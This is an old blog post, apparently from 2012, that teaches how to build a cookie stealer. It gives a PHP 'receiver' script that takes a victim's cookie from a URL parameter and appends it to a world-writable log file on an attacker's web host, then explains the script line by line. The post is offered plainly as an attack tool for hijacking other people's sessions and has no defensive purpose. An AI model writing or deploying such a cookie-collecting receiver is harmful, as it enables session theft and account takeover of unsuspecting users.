Tuesday, 3 January 2012

Make Cookie Stealer PHP Script

How does a cookie stealer work. There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Php Coding a receiver is the part. Only two things are needed to make a receiver : a 
web host / ftp which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said, the receiver's job is to receive the cookie from the sender. Once the receiver has the cookie, it needs a way to get that cookie to you.

<?php                                      // line 1
$cookie = $HTTP_GET_VARS["cookie"];       // line 2
$file = fopen('cookielog.txt', 'a');     // line 3
fwrite($file, $cookie . "\n\n");        // line 4
?>                                     // line 5

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=xyz") and stores it in the variable $cookie.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 Its the same as before.

Its Done ! Just upload the files on ftp server and make permission of text file "cookielog.txt" to 777.

Content From: ICA


Post a Comment